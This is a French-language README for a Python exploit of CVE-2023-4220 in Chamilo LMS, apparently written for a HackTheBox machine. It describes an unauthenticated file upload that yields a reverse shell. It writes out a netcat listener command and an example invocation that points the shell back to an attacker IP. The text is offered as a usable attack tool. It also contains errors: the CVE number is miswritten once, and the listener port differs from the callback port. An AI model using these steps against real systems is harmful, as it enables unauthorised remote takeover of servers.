
Exploit Python pour CVE-2023-4220 dans Chamilo LMS qui téléverse un fichier et délivre un reverse shell non authentifié vers un listener netcat.
pip install requests
Le script Python exploite la vulnérabilité CVE-2023-422 pour téléverser un fichier sur le serveur et utilise ce fichier pour envoyer un reverse shell vers le listener netcat, et tout cela peut être fait sans être authentifié. Cependant, vous devrez suivre les étapes suivantes pour utiliser le script Python avec succès.
Démarrer le listener netcat :
nc -lnvp 4444
Exécution du script Python (exemple) :
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
N'hésitez pas à laisser une étoile si l'exploit suivant vous a été utile :)